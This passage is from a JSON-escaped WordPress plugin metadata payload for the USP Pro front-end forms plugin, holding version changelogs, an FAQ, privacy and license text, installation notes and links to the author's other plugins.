5.3<\\/li>\\n<\\/ul>\\n<p><strong>3.5<\\/strong><\\/p>\\n<ul>\\n<li>Fixes bug with user registration name on uploaded files<\\/li>\\n<li>Adds selectize.js for fancy category select field<\\/li>\\n<li>Changes input type to <code>url<\\/code> for URL field<\\/li>\\n<li>Updates styles for plugin settings page<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Tests on WordPress 5.3<\\/li>\\n<\\/ul>\\n<p><strong>3.4<\\/strong><\\/p>\\n<ul>\\n<li>Improves filter-USP button functionality<\\/li>\\n<li>Adds filter hook <code>usp_filter_posts_link<\\/code><\\/li>\\n<li>Adds support for &quot;Non-USP&quot; post filter button<\\/li>\\n<li>Fixes bug with characters removed from email alerts<\\/li>\\n<li>Fixes bug with multiple files and custom fields<\\/li>\\n<li>Fixes bug with <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-featured-image-key\\/\\\">featured image key<\\/a> not working<\\/li>\\n<li>Fixes bug where WP file editor could not save file changes<\\/li>\\n<li>Fixes bug with WP Site Health (Loopback requests and REST API)<\\/li>\\n<li>Adds filter hook <code>usp_get_file_name<\\/code> for <code>insert_attachments()<\\/code><\\/li>\\n<li>Improves handling of PHP sessions<\\/li>\\n<li>Updates some links to https<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Tests on WordPress 5.3 (alpha)<\\/li>\\n<\\/ul>\\n<p><strong>3.3<\\/strong><\\/p>\\n<ul>\\n<li>Refines USP License screen UI<\\/li>\\n<li>Fixes PHP warning for <code>count()<\\/code><\\/li>\\n<li>Fixes security issue with uploaded images on Apache + FastCGI<\\/li>\\n<li>Adds <code>default<\\/code> attribute for &quot;Agree to Terms&quot; checkbox<\\/li>\\n<li>Improves form posting for Login\\/Register form<\\/li>\\n<li>Bumps <a href=\\\"https:\\/\\/codex.wordpress.org\\/Template:Server_requirements\\\">minimum PHP version<\\/a> to 5.6.20<\\/li>\\n<li>Updates default translation template<\\/li>\\n<li>Tests on WordPress 5.2<\\/li>\\n<\\/ul>\\n<p><strong>3.2.1<\\/strong><\\/p>\\n<ul>\\n<li>Adds another security check for uploaded files (Thanks to Matthias)<\\/li>\\n<li>Tests on WordPress 5.1 and 5.2 (beta)<\\/li>\\n<\\/ul>\\n<p><strong>3.2<\\/strong><\\/p>\\n<ul>\\n<li>Deprecates reCaptcha &quot;Version 1&quot;<\\/li>\\n<li>Removes deprecated (old) reCaptcha<\\/li>\\n<li>Changes default reCaptcha option to &quot;Version 2&quot;<\\/li>\\n<li>Improves display of plugin License screen<\\/li>\\n<li>Improves functionality for one-click plugin updates<\\/li>\\n<li>Fixes bug with timeouts with <code>usp_pro_display_posts<\\/code><\\/li>\\n<li>Provides shortcode for adding <code>#<\\/code> to custom field values<\\/li>\\n<li>Adds <code>url<\\/code> to allowed attributes in <code>sanitize_content()<\\/code><\\/li>\\n<li>Adds check for admin user for settings shortcut link<\\/li>\\n<li>Removes deprecated functions from About tab<\\/li>\\n<li>Refines plugin settings screen UI<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Tests on WordPress 5.1 and 5.2 (alpha)<\\/li>\\n<\\/ul>\\n<p><strong>3.1<\\/strong><\\/p>\\n<ul>\\n<li>Adds shortcode <code>[usp_user_avatar]<\\/code><\\/li>\\n<li>Adds email alert shortcode <code>%%post_slug%%<\\/code><\\/li>\\n<li>Updates plugin settings page details<\\/li>\\n<li>Updates default translation template<\\/li>\\n<li>Tests on WordPress 5.0 (beta)<\\/li>\\n<\\/ul>\\n<p><strong>3.0<\\/strong><\\/p>\\n<ul>\\n<li>Adds additional <code>display<\\/code> options for <code>[usp_pro_display_posts]<\\/code><\\/li>\\n<li>Adds <code>cat=\\\"current\\\"<\\/code> support to <code>[usp_pro_display_posts]<\\/code> shortcode<\\/li>\\n<li>Adds <code>usp-login<\\/code> as <code>id<\\/code> attribute to login\\/register\\/password form<\\/li>\\n<li>Adds <code>rel=\\\"noopener noreferrer\\\"<\\/code> to all <a href=\\\"https:\\/\\/perishablepress.com\\/wordpress-blank-target-vulnerability\\/\\\">blank-target links<\\/a><\\/li>\\n<li>Replaces <code>sanitize_text_field<\\/code> with <code>wp_strip_all_tags<\\/code> for styles<\\/li>\\n<li>Bugfix: JavaScript error flashes as form submits<\\/li>\\n<li>Bugfix: &quot;USP&quot; filter posts button not working for Custom Post Types<\\/li>\\n<li>Bugfix: maxlength attribute for tag field incorrect<\\/li>\\n<li>Bugfix: several PHP Notices were eliminated<\\/li>\\n<li>Improves logic of <code>usp_pro_add_glance_items<\\/code> function<\\/li>\\n<li>Refines dashboard widget functionality<\\/li>\\n<li>Updates GDPR blurb and donate link<\\/li>\\n<li>Regenerates default translation template<\\/li>\\n<li>Further tests on WP versions 4.9 and 5.0 (alpha)<\\/li>\\n<\\/ul>\\n<p><strong>2.9<\\/strong><\\/p>\\n<ul>\\n<li>\\n<p>Adds filter hooks:<\\/p>\\n<ul>\\n<li><code>usp_display_errors<\\/code><\\/li>\\n<li><code>usp_display_errors_all<\\/code><\\/li>\\n<li><code>usp_display_errors_custom<\\/code><\\/li>\\n<li><code>usp_display_posts_args<\\/code><\\/li>\\n<li><code>usp_featured_image<\\/code><\\/li>\\n<li><code>usp_custom_value<\\/code><\\/li>\\n<li><code>usp_custom_custom_value<\\/code><\\/li>\\n<li><code>usp_attachments_postid<\\/code><\\/li>\\n<li><code>usp_max_users<\\/code><\\/li>\\n<li><code>usp_file_ids<\\/code><\\/li>\\n<li><code>usp_image_attachments<\\/code><\\/li>\\n<li><code>usp_file_attachments<\\/code><\\/li>\\n<li><code>usp_display_posts_default<\\/code><\\/li>\\n<li><code>usp_submit_post_after<\\/code><\\/li>\\n<li><code>usp_sanitize_content_kses<\\/code><\\/li>\\n<li><code>usp_widget_submitted_type<\\/code><\\/li>\\n<li><code>usp_widget_submitted_status<\\/code><\\/li>\\n<li><code>usp_alert_shortcut_attachment_args<\\/code><\\/li>\\n<\\/ul>\\n<\\/li>\\n<li>\\n<p>Adds disable-IP option (for example, to comply with GDPR)<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds email shortcode <code>%%post_author%%<\\/code> for Post Author<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds email shortcode <code>%%files%%<\\/code> for list of file URLs<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds submitted post count to &quot;At a Glance&quot; on the Dashboard<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds function to check and warn if free version is installed<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds support for shortcut variables in alert subject line<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds more attributes to <code>[usp_pro_display_posts]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Adds <code>required<\\/code> attribute to <code>[usp_agree]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Adds support for new Limit Posts extension<\\/p>\\n<\\/li>\\n<li>\\n<p>Changes input\\/label attributes on login\\/register form<\\/p>\\n<\\/li>\\n<li>\\n<p>Removes filter hook, <code>usp_shortcode_display_posts_type<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Removes filter hook, <code>usp_settings_author_list_args<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Updates deprecated <code>create_function<\\/code> for PHP 7.2<\\/p>\\n<\\/li>\\n<li>\\n<p>Improves Default Assigned Author setting<\\/p>\\n<\\/li>\\n<li>\\n<p>Limits default output of <code>usp_ids()<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Generates new translation template<\\/p>\\n<\\/li>\\n<li>\\n<p>Tests on WordPress 5.0<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p><strong>Changelog for previous versions<\\/strong><\\/p>\\n<p>Available at Plugin Planet: <a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/files\\/usp-pro\\/changelog.txt\\\">USP Pro changelog<\\/a><\\/p>\\n<p>Also check out the <a href=\\\"https:\\/\\/plugin-planet.com\\/news\\/\\\">announcement posts for each new version<\\/a>.<\\/p>\",\"faq\":\"<h4>Questions? Feedback? Bugs?<\\/h4>\\n<p>There are two channels for getting help:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/forum+usp-pro\\/\\\">Ask a question in the USP Pro Forum<\\/a> (<a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/wp-login.php\\\">login required<\\/a>)<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/support\\/#contact\\\">Send an email via the contact form<\\/a><\\/li>\\n<\\/ul>\\n<p>The contact form is best for direct support, bug reports, and feedback.<\\/p>\\n\"},\"banners\":{\"high\":\"https:\\/\\/plugin-planet.com\\/wp\\/wp-content\\/uploads\\/edd\\/2021\\/07\\/banner-1544x500-1.jpg\",\"low\":\"https:\\/\\/plugin-planet.com\\/wp\\/wp-content\\/uploads\\/edd\\/2021\\/07\\/banner-772x250-1.jpg\"},\"icons\":{\"1x\":\"https:\\/\\/plugin-planet.com\\/wp\\/wp-content\\/uploads\\/edd\\/2021\\/07\\/usp-pro.png\",\"2x\":\"https:\\/\\/plugin-planet.com\\/wp\\/wp-content\\/uploads\\/edd\\/2021\\/07\\/usp-pro.png\"},\"tags\":[\"guest post\",\"user post\",\"anonymous post\",\"frontend post\",\"public post\"],\"requires\":\"4.1\",\"tested\":\"5.8\",\"requires_php\":\"5.6.20\",\"contributors\":{\"specialk\":{\"display_name\":\"specialk\",\"profile\":\"\\/\\/profiles.wordpress.org\\/specialk\",\"avatar\":\"https:\\/\\/wordpress.org\\/grav-redirect.php?user=specialk\"}},\"stable_tag\":\"4.0\",\"donate_link\":\"https:\\/\\/monzillamedia.com\\/donate.html\",\"short_description\":\"Create unlimited forms and let visitors submit content, register, log in, and much more from the front-end of your site.\",\"license\":\"The USP Pro license is comprised of two parts (see \\\"License\\\" section below for details)\",\"upgrade_notice\":\"<p>This plugin has been tested and is 100% current with the latest version of WordPress.<\\/p>\",\"screenshots\":[],\"faq\":[\"<h4>Questions? Feedback? Bugs?<\\/h4>\\n<p>There are two channels for getting help:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/forum+usp-pro\\/\\\">Ask a question in the USP Pro Forum<\\/a> (<a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/wp-login.php\\\">login required<\\/a>)<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/support\\/#contact\\\">Send an email via the contact form<\\/a><\\/li>\\n<\\/ul>\\n<p>The contact form is best for direct support, bug reports, and feedback.<\\/p>\\n\"],\"warnings\":[],\"added\":\"2014-01-12\",\"description\":[\"<p>USP Pro is your complete front-end forms solution, enabling you to create unlimited forms and let visitors submit content, register, and much more.<\\/p>\\n<h3>Features<\\/h3>\\n<p>Visit the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">USP Pro Homepage<\\/a> for features, screenshots, and details.<\\/p>\\n<h3>Getting Started<\\/h3>\\n<p>Check out the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-quick-start\\/\\\">Quick Start Guide<\\/a> for USP Pro.<\\/p>\\n<h3>Documentation<\\/h3>\\n<p>Official USP Pro documentation:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-settings\\/\\\">USP Pro Settings<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-shortcodes\\/\\\">USP Pro Shortcodes<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-template-tags\\/\\\">USP Pro Template Tags<\\/a><\\/li>\\n<\\/ul>\\n<h3>Resources<\\/h3>\\n<p>Further resources and information:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/docs+usp-pro\\/\\\">USP Pro Docs<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/forum+usp-pro\\/\\\">USP Pro Forum<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/tuts+usp-pro\\/\\\">USP Pro Tutorials<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-faqs\\/\\\">USP Pro FAQs<\\/a><\\/li>\\n<\\/ul>\\n<h3>Stay Current<\\/h3>\\n<p>Stay current with USP Pro:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/news+usp-pro\\/\\\">USP Pro News<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/news\\/feed\\/\\\">Grab the News Feed<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/tuts\\/feed\\/\\\">Grab the Tutorials Feed<\\/a><\\/li>\\n<\\/ul>\\n<h3>Getting Help<\\/h3>\\n<p>There are two channels for getting help:<\\/p>\\n<ul>\\n<li>Ask a question in the <a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/forum+usp-pro\\/\\\">USP Pro Forum<\\/a> (<a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/wp-login.php\\\">login required<\\/a>)<\\/li>\\n<li>Send an email via the <a href=\\\"https:\\/\\/plugin-planet.com\\/support\\/#contact\\\">contact form<\\/a><\\/li>\\n<\\/ul>\\n<p>The contact form is best for direct support, bug reports, and feedback.<\\/p>\\n<h3>Downloads<\\/h3>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/wp-login.php\\\">Log in to your account<\\/a> for current downloads.<\\/li>\\n<\\/ul>\\n<p>To learn more about USP Pro, visit <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">Plugin-Planet.com<\\/a>.<\\/p>\\n<h3>Privacy<\\/h3>\\n<p><strong>User Data:<\\/strong> User Submitted Posts (USP) enables users to submit post content. It collects data <em>only<\\/em> from users who voluntarily submit content via the USP form. The only involuntary data that is collected is the IP address of the person submitting the form. The plugin provides an option to disable IP collection completely.<\\/p>\\n<p><strong>Cookies:<\\/strong> This plugin uses simple cookies to enable dynamic form functionality. No cookies are used for any other purpose.<\\/p>\\n<p><strong>Services:<\\/strong> This plugin provides an option to enable Google reCaptcha, which is provided by Google as a third-party service. For details on privacy and more, please refer to official documentation for <a href=\\\"https:\\/\\/developers.google.com\\/recaptcha\\/\\\">Google reCaptcha<\\/a>. No other outside services or locations are accessed\\/used by this plugin.<\\/p>\\n<h3>License<\\/h3>\\n<p>License: The USP Pro license comprises two parts:<\\/p>\\n<ul>\\n<li>\\n<p><strong>Part 1:<\\/strong> Its PHP code is licensed under the GPL (v2 or later), like WordPress. <a href=\\\"https:\\/\\/www.gnu.org\\/licenses\\/\\\">More info<\\/a>.<\\/p>\\n<\\/li>\\n<li>\\n<p><strong>Part 2:<\\/strong> Everything else (e.g., CSS, HTML, JavaScript, images, design) is licensed according to the purchased license. <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">More info<\\/a>.<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p>Without prior written consent from Monzilla Media, you must NOT directly or indirectly: license, sub-license, sell, resell, or provide for free any aspect or component of Part 2.<\\/p>\\n<p>Further license information is available in the plugin directory, <code>\\/license\\/<\\/code>, and <a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/files\\/usp-pro\\/license.txt\\\">online<\\/a>.<\\/p>\\n<p><strong>Upgrades:<\\/strong> Your purchase of USP Pro includes free lifetime upgrades, which include new features, bug fixes, and other improvements. <\\/p>\\n<p>Copyright 2021 Monzilla Media. All rights reserved.<h3>Check out my other plugins<\\/h3>\\nFree WordPress plugins:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/banhammer\\/\\\">Banhammer<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/host-header-injection-fix\\/\\\">Host Header Injection Fix<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/blackhole-bad-bots\\/\\\">Blackhole for Bad Bots<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/block-bad-queries\\/\\\">BBQ Firewall<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/contact-coldform\\/\\\">Contact Coldform<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/dashboard-widgets-suite\\/\\\">Dashboard Widgets Suite<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/ga-google-analytics\\/\\\">GA Google Analytics<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/head-meta-data\\/\\\">Head Meta Data<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/show-support-ribbon\\/\\\">Show Support Ribbon<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-ajax-chat\\/\\\">Simple Ajax Chat<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-basic-contact-form\\/\\\">Simple Basic Contact Form<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-blog-stats\\/\\\">Simple Blog Stats<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-custom-content\\/\\\">Simple Custom Content<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-feed-stats\\/\\\">Simple Feed Stats<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/user-submitted-posts\\/\\\">User Submitted Posts<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/theme-switcha\\/\\\">Theme Switcha<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/prismatic\\/\\\">Prismatic<\\/a><\\/li>\\n<\\/ul>\\n<p>Premium WordPress plugins:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/banhammer-pro\\/\\\">Banhammer Pro<\\/a>    - Monitor traffic and ban bad users and bots<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/bbq-pro\\/\\\">BBQ Pro<\\/a>                - Fastest firewall plugin for WordPress<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/blackhole-pro\\/\\\">Blackhole Pro<\\/a>    - Block bad bots in a virtual black hole<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/ga-google-analytics-pro\\/\\\">GA Pro<\\/a> - Connect WordPress to Google Analytics<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/ses-pro\\/\\\">SES Pro<\\/a>                - Ajax-powered email signup forms<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">USP Pro<\\/a>                - Advanced front-end forms<\\/li>\\n<\\/ul>\\n<p>More awesome plugins on the way :)<\\/p>\"],\"installation\":[\"<h3>Installation<\\/h3>\\n<ol>\\n<li>Upload the plugin and activate via the WP Plugins screen<\\/li>\\n<li>Visit Plugins &gt; USP Pro License to enter your license<\\/li>\\n<\\/ol>\\n<p>Done. USP Pro is now ready for use. Before going further, please read the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-quick-start\\/\\\">USP Pro Quick Start Guide<\\/a>. <\\/p>\\n<p>Learn more about <a href=\\\"https:\\/\\/wordpress.org\\/support\\/article\\/managing-plugins\\/#installing-plugins\\\">installing plugins<\\/a>.<\\/p>\\n<h3>Usage<\\/h3>\\n<p>Usage information available in the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-quick-start\\/\\\">USP Pro Quick Start Guide<\\/a>.<\\/p>\\n<p>Complete plugin documentation available at <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">Plugin-Planet.com<\\/a>. <\\/p>\\n<h3>Upgrades<\\/h3>\\n<p>Your purchase of USP Pro includes free lifetime upgrades, which include new features, bug fixes, and other improvements. When an upgrade is available, WordPress will notify you in the Admin Area. When you see that there is an update available, just click &quot;Update&quot; and WordPress will perform the upgrade automatically. Note that you can <a href=\\\"https:\\/\\/plugin-planet.com\\/download-purchased-plugin\\/\\\">download the latest version of USP Pro at Plugin Planet<\\/a> anytime at your convenience.<\\/p>\\n<p><strong>Pro Tip:<\\/strong> Before upgrading, visit &quot;Tools &gt; Backup &amp; Restore&quot; to back up your current settings. That way if something should go wrong, you can always restore your original settings and start over.<\\/p>\\n<h3>Supported languages<\\/h3>\\n<p>USP Pro includes translations for the following languages:<\\/p>\\n<pre><code>English   = default\\nSlovenian = usp-pro-sl_SI\\nDanish    = usp-pro-da_DK<\\/code><\\/pre>\\n<p><a href=\\\"https:\\/\\/plugin-planet.com\\/#contact\\\">Contact us<\\/a> to request another language.<\\/p>\\n<h3>Shortcodes<\\/h3>\\n<p>Visit the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-shortcodes\\/\\\">USP Pro Shortcodes Reference<\\/a>.<\\/p>\\n<p><strong>Note:<\\/strong> USP Forms must be published (not draft or pending) in order to display via their respective shortcodes.<\\/p>\\n<h3>Template Tags<\\/h3>\\n<p>Visit the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-template-tags\\/\\\">USP Pro Template Tags Reference<\\/a>.<\\/p>\\n<h3>License Information<\\/h3>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/download-purchased-plugin\\/\\\">Download purchased plugin<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/install-plugin\\/\\\">Install purchased plugin<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/upgrade-plugin\\/\\\">Upgrade purchased plugin<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/get-license-key\\/\\\">Get plugin license key<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/activate-deactivate-plugin-license\\/\\\">Activate plugin license<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/transfer-plugin-license\\/\\\">Transfer plugin license<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/manage-license\\/\\\">Manage licensed domains<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/download-purchase-receipt\\/\\\">Download purchase receipt<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/troubleshooting-license-activation\\/\\\">Troubleshooting license activation<\\/a><\\/li>\\n<\\/ul>\\n<h3>Restore Default Options<\\/h3>\\n<p>To restore default plugin options, either uninstall\\/reinstall the plugin, or visit the plugin\'s Tools settings &gt; &quot;Restore Default Settings&quot;.<\\/p>\\n<h3>Uninstalling<\\/h3>\\n<p>USP Pro cleans up after itself. All plugin options will be removed from the database when the plugin is uninstalled via the Plugins screen. All submitted posts will NOT be removed when deactivating or uninstalling the plugin. <em>All submitted posts must be removed manually<\\/em> (if you want\\/choose to remove them).<\\/p>\\n<h3>Like the plugin?<\\/h3>\\n<p>If you like USP Pro, please take a moment to <a href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/user-submitted-posts\\/reviews\\/?rate=5#new-post\\\">give a 5-star rating<\\/a>. It helps to keep development and support going strong. Thank you!<\\/p>\"],\"changelog\":[\"<p>If you like USP, please take a moment to <a href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/user-submitted-posts\\/reviews\\/?rate=5#new-post\\\">give a 5-star rating<\\/a>. It helps to keep development and support going strong. Thank you!<\\/p>\\n<p><strong>4.0<\\/strong><\\/p>\\n<ul>\\n<li>Improves logic of <code>usp_form()<\\/code><\\/li>\\n<li>Adds <code>%%delete_link%%<\\/code> for email alerts<\\/li>\\n<li>Adds CSS classes to Login\\/Register form<\\/li>\\n<li>Adds filter hook <code>usp_submission_redirect<\\/code><\\/li>\\n<li>Adds <code>selected<\\/code> to select field default option<\\/li>\\n<li>Changes Description field to textarea for user registration demo<\\/li>\\n<li>Fixes renaming\\/duplicate bug with demo forms<\\/li>\\n<li>Fixes bug with email alert shortcut variables<\\/li>\\n<li>Moves &quot;Tips &amp; Tricks&quot; to post at Plugin Planet<\\/li>\\n<li>Refines the plugin settings pages<\\/li>\\n<li>Tests on WordPress 5.8<\\/li>\\n<\\/ul>\\n<p><strong>3.9<\\/strong><\\/p>\\n<ul>\\n<li>Adds <code>[url_link]<\\/code> user shortcode<\\/li>\\n<li>Adds filter hook <code>usp_shortcode_url_link<\\/code><\\/li>\\n<li>Adds support to change reCaptcha language<\\/li>\\n<li>Adds filter hook <code>usp_recaptcha_querystring<\\/code><\\/li>\\n<li>Updates Selectize.js frontend control script<\\/li>\\n<li>Updates Parsley.js frontend validation script<\\/li>\\n<li>Updates Vex.js library for modal dialog popups<\\/li>\\n<li>Updates deprecated functions for newer jQuery<\\/li>\\n<li>Updates inline graphics in plugin settings<\\/li>\\n<li>Improves\\/updates readme.txt\\/docs<\\/li>\\n<li>Tests on WordPress 5.7<\\/li>\\n<\\/ul>\\n<p><strong>3.8<\\/strong><\\/p>\\n<ul>\\n<li>Fixes &quot;array offset&quot; PHP notice<\\/li>\\n<li>Fixes &quot;curly braces&quot; PHP notice<\\/li>\\n<li>Fixes bug with numerical taxonomy terms<\\/li>\\n<li>Fixes bug with submit button not displayed<\\/li>\\n<li>Adds support for disable-comments checkbox<\\/li>\\n<li>Updates default translation template<\\/li>\\n<li>Improves\\/updates readme.txt\\/docs<\\/li>\\n<li>Updates license updater script<\\/li>\\n<li>Tests on PHP 7.4 and 8.0<\\/li>\\n<li>Tests on WordPress 5.6<\\/li>\\n<\\/ul>\\n<p><strong>3.7<\\/strong><\\/p>\\n<ul>\\n<li>\\n<p>Adds <code>form_id<\\/code> query parameter to form POST requests<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds <code>post_link<\\/code> attribute to <code>[usp_pro_display_posts]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Adds <code>link_title<\\/code> attribute to <code>[usp_pro_display_posts]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Improves support for multiple forms on the same page<\\/p>\\n<\\/li>\\n<li>\\n<p>Updates default JavaScript support for multiple forms<\\/p>\\n<\\/li>\\n<li>\\n<p>Improves dashboard widget, adds new hooks: <\\/p>\\n<ul>\\n<li><code>usp_widget_drafts_display<\\/code><\\/li>\\n<li><code>usp_widget_display_all_posts<\\/code><\\/li>\\n<li><code>usp_widget_drafts_message_none<\\/code><\\/li>\\n<li><code>usp_widget_drafts_message_some<\\/code><\\/li>\\n<\\/ul>\\n<\\/li>\\n<li>\\n<p>Login form displays &quot;Register&quot; tab only if registration is enabled<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: dashboard widget not showing all submitted posts<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: numeric values now working for custom taxonomy<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: form styles not included with success message<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: duplicate post feature not working for CPTs<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: content filter not working for excerpts<\\/p>\\n<\\/li>\\n<li>\\n<p>Refines default form styles<\\/p>\\n<\\/li>\\n<li>\\n<p>Improves loading of admin CSS\\/JS assets<\\/p>\\n<\\/li>\\n<li>\\n<p>Updates default translation template<\\/p>\\n<\\/li>\\n<li>\\n<p>Refines plugin setting page styles<\\/p>\\n<\\/li>\\n<li>\\n<p>Updates license updater script<\\/p>\\n<\\/li>\\n<li>\\n<p>Refines readme\\/documentation<\\/p>\\n<\\/li>\\n<li>\\n<p>Tests on WordPress 5.5<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p><strong>3.6<\\/strong><\\/p>\\n<ul>\\n<li>Adds Google reCaptcha v3 (hidden reCaptcha)<\\/li>\\n<li>Updates reCaptcha library to version 1.2.4<\\/li>\\n<li>Adds filter hook <code>hook usp_recaptcha_score<\\/code><\\/li>\\n<li>Adds filter hook <code>usp_display_posts_noposts<\\/code><\\/li>\\n<li>Adds filter hook <code>usp_post_tags_use_id<\\/code><\\/li>\\n<li>Adds form-id parameter to <code>usp_form_custom_output<\\/code><\\/li>\\n<li>Adds selectize.js fancy script to tag select field<\\/li>\\n<li>Enables default option for &quot;External Stylesheet&quot;<\\/li>\\n<li>Enables default option for &quot;Include Parsley.js&quot;<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Improves accuracy on plugin settings page<\\/li>\\n<li>Improves styles on plugin settings page<\\/li>\\n<li>Improves styles of USP filter buttons<\\/li>\\n<li>Improves security of form cookies<\\/li>\\n<li>Improves Quicktag button infos<\\/li>\\n<li>Tests on WordPress 5.3<\\/li>\\n<\\/ul>\\n<p><strong>3.5.1<\\/strong><\\/p>\\n<ul>\\n<li>Fixes bug with new &quot;fancy&quot; category field<\\/li>\\n<li>Tests on WordPress 5.3<\\/li>\\n<\\/ul>\\n<p><strong>3.5<\\/strong><\\/p>\\n<ul>\\n<li>Fixes bug with user registration name on uploaded files<\\/li>\\n<li>Adds selectize.js for fancy category select field<\\/li>\\n<li>Changes input type to <code>url<\\/code> for URL field<\\/li>\\n<li>Updates styles for plugin settings page<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Tests on WordPress 5.3<\\/li>\\n<\\/ul>\\n<p><strong>3.4<\\/strong><\\/p>\\n<ul>\\n<li>Improves filter-USP button 